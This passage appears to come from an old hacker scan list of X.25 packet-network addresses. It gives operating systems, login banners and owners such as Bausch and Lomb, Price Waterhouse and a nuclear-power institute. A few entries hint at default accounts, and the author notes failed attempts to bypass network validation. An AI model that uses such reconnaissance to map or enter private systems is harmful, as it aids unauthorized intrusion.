  7548. 703 57                 SELECT A SERVICE: TSO WYLBUR CMS PCI
  7549. 703 137  *
  7550. 703 157                ZA60001  - COM-PLETE IS ACTIVE
  7551. 703 160    VAX/VMS
  7552.  
  7553.  
  7554.  
  7555.  
  7556. 708  -  Illinois  Scanned: [0 - 1000]      
  7557.  
  7558. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7559. ---------- ----------- ------------------------------------------------- 
  7560. 708 34                 USER ID   
  7561. 708 50                 Please enter authorized ID:
  7562. 708 54   $ VAX/VMS     Duff & Phelps Corporate VAX 8350 (CO) 
  7563. 708 66   $             CONNECTED TO PACKET/74
  7564. 708 70     VAX/VMS     System LPCOMA 
  7565. 708 133    VAX/VMS
  7566. 708 138  *
  7567. 708 142                Enter user name:
  7568. 708 146  *
  7569. 708 152                ORBIT
  7570. 708 153                ORBIT
  7571. 708 154                ORBIT
  7572. 708 155                ORBIT
  7573. 708 156                ORBIT
  7574. 708 157.4              Orbit PAD
  7575. 708 157.5              Maxwell Onlines' File Transfer BBS
  7576. 708 158                ncp02> enter system id (brs)
  7577. 708 161                CONNECTED TO PACKET/94
  7578. 708 171    Unix/SysV   FTD BBS (Flowers..)    
  7579. 708 178    Unix/SysV   FTD BBS
  7580. 708 237    Prime       PRIMENET 22.1.3 DZ-CHI
  7581. 708 240                USER ID
  7582. 708 241                USER ID 
  7583. 708 242                USER ID 
  7584. 708 243                USER ID 
  7585. 708 244                USER ID 
  7586. 708 245                USER ID
  7587. 708 246                USER ID 
  7588. 708 247                USER ID 
  7589. 708 248                USER ID 
  7590. 708 249                USER ID  
  7591. 708 250                USER ID 
  7592. 708 251                USER ID  
  7593. 708 252                USER ID 
  7594. 708 253                USER ID 
  7595. 708 254                USER ID 
  7596. 708 260                ORBIT
  7597. 708 261                ncp02> enter system id  (brs)
  7598. 708 272  $ DTC         'H' or '?' for  help
  7599. 708 278  *
  7600. 708 340                ORBIT
  7601. 708 341                ORBIT
  7602. 708 343                ORBIT
  7603. 708 346                ENTER APPLID: V=VTAM, A=APPLA, B-APPLB, C=APPLC
  7604. 708 1030               ORBIT
  7605. 708 1031               ORBIT
  7606. 708 1032               ORBIT
  7607. 708 1033               ORBIT
  7608. 708 1034               ORBIT
  7609.  
  7610.  
  7611.  
  7612.  
  7613. 711  -  unknown  Scanned: various     
  7614.  
  7615. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7616. ---------- ----------- ------------------------------------------------- 
  7617. 711 15     Prime
  7618.  
  7619.  
  7620.  
  7621.  
  7622. 714  -  California  Scanned: 0 - 300      
  7623.  
  7624. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7625. ---------- ----------- -------------------------------------------------
  7626. 714 4    $             outdial (714)
  7627. 714 23   $             outdial (714)
  7628. 714 24   $             outdial (714)
  7629. 714 50     Unix        atma_1
  7630. 714 55   $ HP-3000     HP957.MIS.FUJITSU 
  7631. 714 102  $             ? \
  7632. 714 119  $             ?  \ outdials? (barred to my pad)
  7633. 714 121  $             ?  /
  7634. 714 124  $             ? /
  7635. 714 130  $             MMSA --- ENTER APPLICATION ID :
  7636. 714 131    Prime       PRIMENET 22.1.2 CAJH  
  7637. 714 133  *
  7638. 714 134
  7639. 714 138  $             MMSA --- ENTER APPLICATION ID :
  7640. 714 139  $             MMSA --- ENTER APPLICATION ID :
  7641. 714 210  $             outdial (global)
  7642. 714 213  $             ?
  7643. 714 236  *
  7644. 714 242    VM/CMS
  7645. 714 250  *
  7646.  
  7647.  
  7648.  
  7649.  
  7650. 716  -  New York  Scanned: [0 - 300]
  7651.  
  7652. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7653. ---------- ----------- ------------------------------------------------- 
  7654. 716 50 
  7655. 716 140 
  7656. 716 141  *
  7657. 716 232    TSO         Bausch and Lomb  Data Center 
  7658. 716 233    TSO         Bausch and Lomb  Data Center  
  7659. 716 234    TSO         B + L  DATA CENTER SERVICES
  7660. 716 235    TSO         B + L  DATA CENTER SERVICES
  7661. 716 236    TSO         B + L  DATA CENTER SERVICES
  7662. 716 237    TSO         B + L  DATA CENTER SERVICES
  7663. 716 238    TSO         B + L  DATA CENTER SERVICES
  7664. 716 239    TSO         B + L  DATA CENTER SERVICES
  7665. 716 240    TSO         B + L  DATA CENTER SERVICES
  7666. 716 241    TSO         B + L  DATA CENTER SERVICES
  7667. 716 242    TSO         B + L  DATA CENTER SERVICES
  7668. 716 603    TSO         B + L  DATA CENTER SERVICES
  7669. 716 605    TSO         B + L  DATA CENTER SERVICES
  7670.  
  7671.  
  7672.  
  7673.  
  7674. 717  -  Pennsylvania  Scanned: [0 - 500]     
  7675.  
  7676. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7677. ---------- ----------- ------------------------------------------------- 
  7678. 717 24   *
  7679. 717 31 
  7680. 717 32   *
  7681. 717 33   *
  7682. 717 34   *
  7683. 717 44 
  7684. 717 45    VOS          (use "list_users")
  7685. 717 46    VOS
  7686. 717 47                 Woolworth Management Information Center X.25 
  7687. 717 48                 Woolworth Management Information Center X.25
  7688. 717 51                 Woolworth Management Information Center Multi-System 
  7689. 717 54                 $TM/ID:      (Sprint Address Directory)
  7690. 717 55                 $TM/ID:
  7691. 717 56                 $TM/ID:
  7692. 717 150 *
  7693. 717 160 *
  7694. 717 161 *
  7695. 717 162 *
  7696. 717 163 *
  7697. 717 234 $ HP-3000      hello field.support
  7698. 717 242 $
  7699. 717 243                CONNECTED TO PACKET/400
  7700.  
  7701.  
  7702.  
  7703.  
  7704. 747  -  Boeing  Scanned: [N/A]      
  7705.  
  7706. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7707. ---------- ----------- ------------------------------------------------- 
  7708. 747        Note: All addresses in this prefix pass through a network
  7709.                  security validator. I was unable to get passed it and
  7710.                  unable to scan this prefix.
  7711.                  
  7712.                  Network validations as follows:
  7713.  
  7714.                  ENTER USERID>       
  7715.                  ENTER PASSWORD>
  7716.                  ENTER SERVICE NAME> 
  7717.                  INVALID USER IDENTIFICATION
  7718.  
  7719.                  After too many attempts, you get this cheerful message:
  7720.  
  7721.                  NOTICE!!!   This is a private network.  It is
  7722.                  restricted to authorized users only.  If you do
  7723.                  not have authorization, you are warned to
  7724.                  disconnect at once.  Actual or attempted use,
  7725.                  access, communication or examination by
  7726.                  unauthorized persons will result in criminal
  7727.                  and civil prosecution to the full extent of
  7728.                  the law.
  7729.   
  7730.                  If you require assistance in the use of this
  7731.                  network or access to this network, please call:
  7732.                                                     206-865-7168
  7733.                                       if no answer  206-234-0911
  7734.   
  7735.  
  7736.  
  7737.  
  7738.  
  7739.  
  7740. 755  -  unknown  Scanned: [various]      
  7741.  
  7742. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7743. ---------- ----------- ------------------------------------------------- 
  7744. 755 1001 $ Prime
  7745. 755 1002 $ Prime
  7746. 755 1003 $ Prime
  7747. 755 1004 $ Prime
  7748. 755 1012 $             MHP201A IUX0306   APPLICATION: 
  7749. 755 1014 $             MHP201A LUX0502   APPLICATION: 
  7750. 755 1020 $
  7751. 755 1023 $             MHP201A ITVG0182  APPLICATION: 
  7752. 755 1025 $             MHP201A ITVG0182  APPLICATION:
  7753.  
  7754.  
  7755.  
  7756.  
  7757. 757  -  unknown  Scanned: [various]
  7758.  
  7759. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7760. ---------- ----------- ------------------------------------------------- 
  7761. 757 120                (echo)
  7762. 757 126                MSG10-RJRT TERMINAL-ID:GSSCXB61 IS NOW IN SESSION
  7763.  
  7764.  
  7765.  
  7766.  
  7767. 784  -  unknown  Scanned: [various]      
  7768.  
  7769. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7770. ---------- ----------- ------------------------------------------------- 
  7771. 784 11000 $            Operator:
  7772.  
  7773.  
  7774.  
  7775.  
  7776.  
  7777. 787  -  unknown  Scanned: [various]      
  7778.  
  7779. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7780. ---------- ----------- ------------------------------------------------- 
  7781. 787 0      Prime
  7782. 787 1      Prime
  7783. 787 2      Prime
  7784. 787 10001$
  7785. 787 50001              USER ID-->    (diverted for network validation)
  7786. 787 50002$             Enter profile ID:
  7787. 787 50003$
  7788. 787 50005 
  7789. 787 50006$
  7790. 787 70001
  7791. 787 70002$
  7792. 787 90001  Prime
  7793. 787 90003$
  7794. 787 90006  Prime       PRIMENET 23.2.0v.PSWI STH-A 
  7795. 787 90007$
  7796. 787 90008  CRYPTO      ENTER "IDX" OR "ID" AND USER ID -->
  7797. 787 90012 
  7798. 787 90014  VAX/VMS
  7799. 787 90015$             USER ID-->
  7800. 787 90016$
  7801. 787 90018$
  7802. 787 90023$
  7803. 787 90025$ VAX/VMS      V{lkommen...  
  7804. 787 90026$              access barred
  7805.  
  7806.  
  7807.  
  7808.  
  7809. 789  -  unknown  Scanned: [various]
  7810.  
  7811. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7812. ---------- ----------- ------------------------------------------------- 
  7813. 789 11000  Prime
  7814.  
  7815.  
  7816.  
  7817.  
  7818. 801  -  Utah  Scanned: [0 - 300]      
  7819.  
  7820. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7821. ---------- ----------- ------------------------------------------------- 
  7822. 801 25                 Wasatch System. 
  7823. 801 26                 Wasatch System.
  7824. 801 27                 Wasatch System. 
  7825. 801 54   $ VAX/VMS     WELCOME TO SOLO - Unathorized use prohibited  
  7826. 801 250                ID?> 
  7827. 801 260 
  7828. 801 360  *
  7829. 801 362 
  7830.  
  7831.  
  7832.  
  7833.  
  7834. 804  -  Virginia  Scanned: [0 - 300]      
  7835.  
  7836. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7837. ---------- ----------- ------------------------------------------------- 
  7838. 804 35     VAX/VMS
  7839. 804 50   *
  7840. 804 153
  7841. 804 241  $             CONNECTED TO PACKET/74  
  7842. 804 242  *
  7843. 804 243  *
  7844. 804 244  *
  7845. 804 245  *
  7846. 804 256                CONNECTED TO PACKET/94
  7847. 804 261  *
  7848. 804 263  *
  7849. 804 264  *
  7850.  
  7851.  
  7852.  
  7853.  
  7854. 805  -  California  Scanned: [0 - 300]      
  7855.  
  7856. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7857. ---------- ----------- ------------------------------------------------- 
  7858. 805 50     VAX/VMS
  7859. 805 51     VAX/VMS
  7860. 805 52     VAX/VMS
  7861. 805 150    Prime       PRIMENET 22.0.1 MBM   
  7862. 805 230  $
  7863.  
  7864.  
  7865.  
  7866.  
  7867. 810  -  unknown  Scanned: various      
  7868.  
  7869. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7870. ---------- ----------- ------------------------------------------------- 
  7871. 810 26   *
  7872.  
  7873.  
  7874.  
  7875.  
  7876. 811  -  unknown  Scanned: various      
  7877.  
  7878. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7879. ---------- ----------- -------------------------------------------------
  7880. 811 13.12              *  
  7881. 811 13.16  Unix/SysV 
  7882. 811 15   *
  7883. 811 17   $ HP-3000
  7884. 811 21   $ Unix
  7885. 811 22   $ Unix
  7886. 811 24   $ Unix
  7887. 811 25                 TACL 1> 
  7888. 811 27.18  Unix/SysV
  7889. 811 27.19  Unix/SysV
  7890. 811 43.14  Unix/SysV
  7891. 811 43.15  Unix/SysV
  7892. 811 67
  7893. 811 68 
  7894. 811 76.18  Unix/SysV   Highlands VMS A login:
  7895. 811 76.19  DACS1       (try 'help' - tons of cmds available)
  7896. 811 84.19              *   stat==STATUS STATISTICS? 
  7897. 811 85.2               *
  7898. 811 141 
  7899. 811 142 
  7900. 811 150.10             *
  7901. 811 315
  7902. 811 316
  7903. 811 411                MHP201A UEVT20U0  
  7904. 811 412                BA
  7905. 811 413                @@
  7906. 811 414                @@
  7907. 811 415 
  7908.  
  7909.  
  7910.  
  7911.  
  7912. 813  -  Florida  Scanned: [0 - 1000]      
  7913.  
  7914. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7915. ---------- ----------- ------------------------------------------------- 
  7916. 813 20   *
  7917. 813 21   *
  7918. 813 48   *
  7919. 813 52   $             Price Waterhouse
  7920. 813 53   *
  7921. 813 55   $             Price Waterhouse     
  7922. 813 59   $             Price Waterhouse National Admin Center
  7923. 813 73     VM/CMS
  7924. 813 74                 $$ 4200 MODEL:  
  7925. 813 124  *
  7926. 813 138  *
  7927. 813 143A               IBM Information Services.
  7928. 813 147A               IBM Information Services.
  7929. 813 149  * 
  7930. 813 151  $             Price Waterhouse
  7931. 813 153  *
  7932. 813 154  *
  7933. 813 172A               IBM Information Services.
  7934. 813 174A               IBM Information Services, Information Network
  7935. 813 237  *
  7936. 813 240 
  7937. 813 248 
  7938. 813 261  *
  7939. 813 266A               IBM Information Services.
  7940. 813 267A               IBM Information Services.
  7941. 813 269    VAX/VMS
  7942. 813 270    VAX/VMS
  7943. 813 271                Access Code: 
  7944. 813 272    Prime
  7945. 813 277                U#=
  7946. 813 330  *
  7947. 813 333
  7948. 813 352 
  7949. 813 358                USER ID 
  7950. 813 377
  7951. 813 433                USER ID 
  7952. 813 434                USER ID 
  7953. 813 436                U#=
  7954. 813 438    VAX/VMS
  7955. 813 450
  7956. 813 456                USER ID
  7957. 813 457                USER ID 
  7958. 813 458                USER ID
  7959. 813 459                USER ID 
  7960. 813 460                USER ID 
  7961. 813 461                USER ID  
  7962. 813 465                USER ID
  7963. 813 466                USER ID 
  7964. 813 467                USER ID
  7965. 813 468                USER ID 
  7966. 813 469                USER ID 
  7967. 813 470                USER ID 
  7968. 813 471                USER ID
  7969. 813 472                USER ID 
  7970. 813 660 
  7971. 813 1330 *
  7972. 813 1340 *
  7973.  
  7974.  
  7975.  
  7976.  
  7977. 814  -  Pennsylvania  Scanned: [0 - 200]      
  7978.  
  7979. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7980. ---------- ----------- ------------------------------------------------- 
  7981. 814 50     Prime       PRIMENET 23.2.0.R39 SYSA  
  7982. 814 130  *
  7983.  
  7984.  
  7985.  
  7986.  
  7987. 816  -  Missouri  Scanned: [0 - 1000 & various]
  7988.  
  7989. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  7990. ---------- ----------- ------------------------------------------------- 
  7991. 816 31   *
  7992. 816 36   
  7993. 816 179  *
  7994. 816 231    VAX/VMS
  7995. 816 237    VAX/VMS
  7996. 816 238    VAX/VMS
  7997. 816 258  *
  7998. 816 259  *
  7999. 816 341 
  8000. 816 356  *
  8001. 816 358                CONNECTED TO PACKET/94
  8002. 816 359                CONNECTED TO PACKET/94
  8003. 816 364  *
  8004. 816 434 
  8005. 816 442  *
  8006. 816 444  *
  8007. 816 447  *
  8008. 816 450    VAX/VMS
  8009. 816 455
  8010. 816 456 
  8011. 816 462  *
  8012. 816 479  *
  8013. 816 1041 $             (echo)
  8014. 816 1042 $
  8015. 816 1045 $
  8016. 816 1046 $
  8017. 816 1059 *
  8018. 816 1058 *
  8019. 816 1300   Major BBS   WELCOME TO THE OASIS BBS - NODE 1
  8020. 816 90031*
  8021. 816 90032*
  8022. 816 90038
  8023. 816 90042  VAX/VMS     #3MRPGWY
  8024.  
  8025.  
  8026.  
  8027.  
  8028. 818  -  California  Scanned: [0 - 300]      
  8029.  
  8030. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  8031. ---------- ----------- ------------------------------------------------- 
  8032. 818 21   *
  8033. 818 30   *
  8034.  
  8035.  
  8036.  
  8037.  
  8038. 834  -  unknown  Scanned: various      
  8039.  
  8040. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  8041. ---------- ----------- ------------------------------------------------- 
  8042. 834 10003  VAX/VMS                            
  8043. 834 10004  VAX/VMS
  8044. 834 10005  VAX/VMS
  8045. 834 10006  VAX/VMS
  8046. 834 10007  VAX/VMS
  8047. 834 10050 through 10099 are all VAXes
  8048. 834 10100  Unix        BIX -- ttyx1c, 34101 (Byte Information eXchange)
  8049. 834 10101 through 10999 are all VAXes
  8050. 834 20005  Prime       PRIMENET 20.2.7 IREX  
  8051. 834 20009              MHP1201I TERMINAL CONNECTED TO PACKET/400
  8052. 834 20201              (no response)
  8053. 834 20202
  8054. 834 20203
  8055. 834 20204
  8056. 834 20205
  8057.  
  8058.  
  8059.  
  8060.  
  8061. 840-849  -  unknwon  Scanned:[N/A]
  8062.  
  8063. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  8064. ---------- ----------- ------------------------------------------------- 
  8065. 840        Note: All these prefixes except 845 pass through Sprint's
  8066. 841              TAMS Network validation. I was unable to get passed this 
  8067. 842              to scan. These addresses are only left in for the sake of
  8068. 843              completeness.
  8069. 844
  8070. 845      *       845 seems to be disabled.
  8071. 846        
  8072. 847              Network validation as follows:
  8073. 848
  8074. 849              YOUR CALL HAS BEEN DIVERTED FOR NETWORK USER VALIDATION.
  8075.                  USER ID :  
  8076.                  PASSWORD :  
  8077.                  BH:INVALID USER ID OR PASSWORD. 
  8078.  
  8079.  
  8080.  
  8081.  
  8082.  
  8083. 890-895  -  unknown  Scanned:[N/A]      
  8084.  
  8085. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  8086. ---------- ----------- ------------------------------------------------- 
  8087. 890      $ Note: none of these addresses accept collect connections,
  8088. 891      $       and all of them pass through some sort of network
  8089. 892      $       validation. I was unable to get past this, and scan
  8090. 893      $       them. These are only left in for the sake of completeness.
  8091. 894      $
  8092. 895      $       Network validation as follows:
  8093.                 
  8094.                  ADTN USER ID: 
  8095.                  ADTN PASSWORD: 
  8096.  
  8097.  
  8098.  
  8099.  
  8100. 909  -  SprintNet  Scanned: various
  8101.  
  8102. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  8103. ---------- ----------- ------------------------------------------------- 
  8104. 909 3    $             SprintNet Pad
  8105. 909 6                  
  8106. 909 8      Prime
  8107. 909 9      Prime
  8108. 909 10     Prime
  8109. 909 12     Prime
  8110. 909 13
  8111. 909 14                 SprintNet Pad
  8112. 909 18 
  8113. 909 18.11              DJ    
  8114. 909 18.13              CARL  
  8115. 909 18.14              APPLE 
  8116. 909 18.15              GTEES 
  8117. 909 18.16              SONIC
  8118. 909 18.17              NLM
  8119. 909 18.18              ECSBBDS
  8120. 909 18.19              ECSDIRE
  8121. 909 18.20              ECSDREV
  8122. 909 18.22              PLANETM
  8123. 909 18.23              PLANDIR
  8124. 909 18.24              SCANDIR
  8125. 909 18.25              SCANECS
  8126. 909 18.26              GRASSRT
  8127. 909 18.27              GABST
  8128. 909 18.28              INPLAND
  8129. 909 18.29              INPLANM
  8130. 909 18.30              ECHO
  8131. 909 18.31              FARS
  8132. 909 18.33              ACTB
  8133. 909 18.34              OAG
  8134. 909 18.35              CAPLANM
  8135. 909 18.38              PLANPBB
  8136. 909 18.39              DOAG
  8137. 909 18.40              ACSDB
  8138. 909 18.41              TOP
  8139. 909 18.42              PAGES
  8140. 909 18.43              CHEMJOB
  8141. 909 18.44              OHPLANM
  8142. 909 18.45              OHPLAND
  8143. 909 18.46              ILPLANM
  8144. 909 18.47              ILPLAND
  8145. 909 18.48              GWN
  8146. 909 18.49              CHEMREF
  8147. 909 18.50              BOREAL
  8148. 909 18.51              COMPETE
  8149. 909 18.52              SAMI
  8150. 909 18.53              UTINFO
  8151. 909 18.54              KWIC
  8152. 909 18.55              GRAD
  8153. 909 18.56              SYM
  8154. 909 18.57              CONDO
  8155. 909 18.58              ISTHMUS
  8156. 909 18.59              NETWRKS
  8157. 909 18.70              PLANOSA
  8158. 909 18.71              GROUP
  8159. 909 18.72              CMADR
  8160. 909 18.73              NEWS
  8161. 909 18.74              IEEEDB
  8162. 909 18.75              XDATA
  8163. 909 18.76              LOCAL
  8164. 909 18.77              CAPLAND
  8165. 909 18.78              ERC
  8166. 909 18.79              SEAGRAN
  8167. 909 18.80              NSSDC
  8168. 909 18.83              COLD
  8169. 909 18.84              GEOREF
  8170. 909 18.85              NTIS
  8171. 909 18.86              CURRENT
  8172. 909 18.87              SABRE
  8173. 909 18.88              ARCTIC
  8174. 909 18.89              ECS
  8175. 909 23     Prime
  8176. 909 26     Prime
  8177. 909 27     Prime
  8178. 909 33   $             (not from this DTE)
  8179. 909 38                 User name?
  8180. 909 39     Prime
  8181. 909 44     Prime
  8182. 909 49                 USER ID
  8183. 909 51                 Your call cannot be completed (unknown destination).
  8184. 909 52                 Your call cannot be completed (unknown destination).
  8185. 909 53                 User name?  
  8186. 909 54
  8187. 909 55                 USER ID 
  8188. 909 58 
  8189. 909 58
  8190. 909 62                 User name? 
  8191. 909 63                 User name?
  8192. 909 65                 User name? 
  8193. 909 77     Prime
  8194. 909 79                 MHP201A XLU76001  * VERSION 6.1.3 *
  8195. 909 82     Prime
  8196. 909 90     Prime
  8197. 909 92     Prime
  8198. 909 94     Prime
  8199. 909 95     Prime
  8200. 909 97     Prime
  8201. 909 98     Prime       Please login [CMOS]: 
  8202. 909 100    Prime
  8203. 909 103                TELENET ASYNC TO 3270 SERVICE 
  8204. 909 104                TELENET ASYNC TO 3270 SERVICE
  8205. 909 107  *
  8206. 909 116    Prime
  8207. 909 117    Prime
  8208. 909 121 
  8209. 909 123                User name?
  8210. 909 125 
  8211. 909 126 
  8212. 909 130    Prime
  8213. 909 131    Prime
  8214. 909 136    Prime
  8215. 909 137    Prime
  8216. 909 139    Prime
  8217. 909 140                TACL 1> 
  8218. 909 141    Prime
  8219. 909 143    Prime
  8220. 909 144    Prime
  8221. 909 146                User name?
  8222. 909 147                User name?
  8223. 909 148                User name? 
  8224. 909 149                User name? 
  8225. 909 151                
  8226. 909 153                TACL 1> 
  8227. 909 155                User name? 
  8228. 909 158                User name?
  8229. 909 159                User name?
  8230. 909 160                User name? 
  8231. 909 161                User name?
  8232. 909 162                User name? 
  8233. 909 165                User name? 
  8234. 909 167                TACL 1> 
  8235. 909 168                User name?
  8236. 909 171                TELENET ASYNC TO 3270 SERVICE 
  8237. 909 172                TELENET ASYNC TO 3270 SERVICE 
  8238. 909 173                User name?
  8239. 909 176    Prime
  8240. 909 178                USER ID 
  8241. 909 179                USER ID 
  8242. 909 184    Prime
  8243. 909 205    Prime
  8244. 909 206    Prime
  8245. 909 212    Prime       Please login [S212]:
  8246. 909 235    Prime       Please Login [S235]:
  8247. 909 236    Prime       Please Login [S235]:   
  8248. 909 239    Prime 
  8249. 909 302    Prime       Please login [S302]: 
  8250. 909 331  *
  8251. 909 352                !LOAD AND FUNCTION TESTER
  8252. 909 353                !LOAD AND FUNCTION TESTER
  8253. 909 354                !LOAD AND FUNCTION TESTER
  8254. 909 355                !LOAD AND FUNCTION TESTER
  8255. 909 400                User name? 
  8256. 909 401                User name?
  8257. 909 402    Unix        DG/UX Release 4.31. AViiON (tpx1b)
  8258. 909 403                User name? 
  8259. 909 404                User name? 
  8260. 909 406                User name? 
  8261. 909 407                User name?  
  8262. 909 408                User name? 
  8263. 909 409                User name? 
  8264. 909 500    Prime
  8265. 909 501    Prime
  8266. 909 502    Prime
  8267. 909 503    Prime
  8268. 909 555    Unix        DG/UX  (joker)
  8269. 909 615    Prime 
  8270. 909 623                User Name?  
  8271. 909 626                User name? 
  8272. 909 627                User name? 
  8273. 909 628                User name? 
  8274. 909 629                User name? 
  8275. 909 630                User name? 
  8276. 909 631                PC-Pursuit BBS                
  8277. 909 640                User name? 
  8278. 909 641                User name?
  8279. 909 642                User name?
  8280. 909 643                User name?
  8281. 909 644    Unix        X.29 Terminal Service (courts)
  8282. 909 645                User name?
  8283. 909 649 
  8284. 909 650                User name?
  8285. 909 651                User name?
  8286. 909 652    Unix        X.29 Terminal Service (courts)
  8287. 909 656                REJECTING 00 00
  8288. 909 661                
  8289. 909 751                SPRINT EASTERN REGION NETWORK 
  8290. 909 761                User name?
  8291. 909 762                User name?
  8292. 909 763                User name?
  8293. 909 764                TELENET ASYNC TO 3270 SERVICE 
  8294. 909 767                SPRINT EASTERN REGION NETWORK
  8295. 909 769 
  8296. 909 770    Unix        X.29 Terminal Service (fan2)
  8297. 909 772    Prime
  8298. 909 776    Unix        DG/UX Release 4.31. AViiON (tpx1b)
  8299. 909 777                TELENET ASYNC TO 3270 SERVICE 
  8300. 909 779                TELENET ASYNC TO 3270 SERVICE 
  8301. 909 784                TELENET ASYNC TO 3270 SERVICE
  8302. 909 798    Prime       Please login [S798] 
  8303. 909 800                User name? help
  8304. 909 801    Unix        DG/UX Release 4.31. AViiON (tpx1b)
  8305. 909 805                User name? 
  8306. 909 806                Your call cannot be completed (unknown destination).
  8307. 909 811    Unix        DG/UX Release 4.31. AViiON (tpx1b)
  8308. 909 813                User name?  
  8309. 909 814                User name? 
  8310. 909 816                User name? 
  8311. 909 817                User name? 
  8312. 909 818                User name?  
  8313. 909 819                User name?
  8314. 909 822                User name? 
  8315. 909 823                User name? 
  8316. 909 824                User name? 
  8317. 909 828                User name?
  8318. 909 830                User name?
  8319. 909 831                User name?
  8320. 909 840                User name?
  8321. 909 841                User name?
  8322. 909 842                User name? 
  8323. 909 843                User name? 
  8324. 909 844                User name?  
  8325. 909 845                User name? 
  8326. 909 846                Your call cannot be completed (unknown destination).
  8327. 909 847
  8328. 909 849    Unix        X.29 Terminal Service
  8329. 909 900    Prime
  8330. 909 901    Prime
  8331. 909 2070   Prime       Please Login [S235]: 
  8332. 909 2075   Prime       Please login [S2075]:
  8333. 909 2080   Prime       Please login [CMOS]:
  8334. 909 2086   Unix        DG/UX  (iceman) 
  8335. 909 2090   Prime       Please login [S798] 
  8336. 909 2091   Prime
  8337. 909 2092   Prime
  8338.  
  8339.  
  8340.  
  8341.  
  8342. 910  -  SprintNet  Scanned: various     
  8343.  
  8344. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  8345. ---------- ----------- ------------------------------------------------- 
  8346. 910 100    Prime
  8347. 910 101    Prime
  8348. 910 200    Prime
  8349. 910 400    Prime
  8350. 910 401    Prime
  8351. 910 500    Prime
  8352. 910 501    Prime
  8353. 910 503    Prime       Please Login.
  8354. 910 504    Prime       Please Login.
  8355. 910 600    Prime  
  8356. 910 601    Prime
  8357.  
  8358.  
  8359.  
  8360.  
  8361. 920  -  unknown  Scanned: [various]      
  8362.  
  8363. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  8364. ---------- ----------- ------------------------------------------------- 
  8365. 920 102                INSTITUTE OF NUCLEAR POWER OPERATIONS
  8366. 920 103                INSTITUTE OF NUCLEAR POWER OPERATIONS
  8367. 920 104                You are now connected to the computer. (16)
  8368. 920 105                INSTITUTE OF NUCLEAR POWER OPERATIONS
  8369. 920 106                You are now connected to the computer. (16)
  8370. 920 107                You are now connected to the computer. (16)
  8371.  
  8372.  
  8373.  
  8374.  
  8375. 933  -  unknown  Scanned: [various]      
  8376.  
  8377. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  8378. ---------- ----------- ------------------------------------------------- 
  8379. 933 10000  Unix        DG/UX Release 4.32. AViiON (atlantic)
  8380.                        Note: all other addr's after 1000 = BUSY!
  8381.  
  8382.  
  8383.  
  8384.  
  8385. Mnemonic Addresses  Scanned: N/A
  8386.  
  8387. ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
  8388. ---------- ----------- ------------------------------------------------- 
  8389. APPLE      Unix        4.3 BSD UNIX (apple.com)
  8390. BCS                    ACCESS TO THIS ADDRESS NOT PERMITTED.
  8391. BETA                   (hangs)
  8392. BIX        Unix        Welcome to BIX -- ttyx11c, 34101
  8393. BRS                    ENTER BRS PASSWORD 
  8394. CCC02                  GOOD DAY, PLEASE ENTER YOUR ID NUMBER
  8395. CCC03                  GOOD DAY, PLEASE ENTER YOUR ID NUMBER
  8396. CLARIONET  Major BBS   Userid : new
  8397. CMS                    enter a for astra 
  8398. COM                    NOT REACHABLE 05 E6
  8399. CONTEL                 GTE Contel DUAT System (airplane stuff)
  8400. COS                    enter a for astra 
  8401. D41        Prime       Primecom Network 19.4Q.111 System 41
  8402. D42        Prime       Primecom Network 19.4Q.111 System 42
  8403. D43        Prime       Primecom Network 19.4Q.111 System 43
  8404. D44        Prime       Primecom Network 19.4Q.111 System 44
  8405. D46        Prime       Primecom Network 19.4Q.111 System 46
  8406. D52        Prime       Primecom Network 19.4Q.111 System 52
  8407. D56        Prime       Primecom Network 18.4Y System 56
  8408. D57        Prime       Primecom Network 19.4Q.111 System 57
  8409. D61        Prime       Primecom Network 19.4Q.111 System 31
  8410. D64        Prime       Primecom Network 19.4Q.111 System 64
  8411. DELPHI     VAX/VMS     Username:                     
  8412. DIALOG                 Dialog Information Services
  8413. DIR
  8414. DOW                    WHAT SERVICE PLEASE????
  8415. DUAT                   GTE Contel DUAT System
  8416. DUNS                   Dunsnet (D&B)
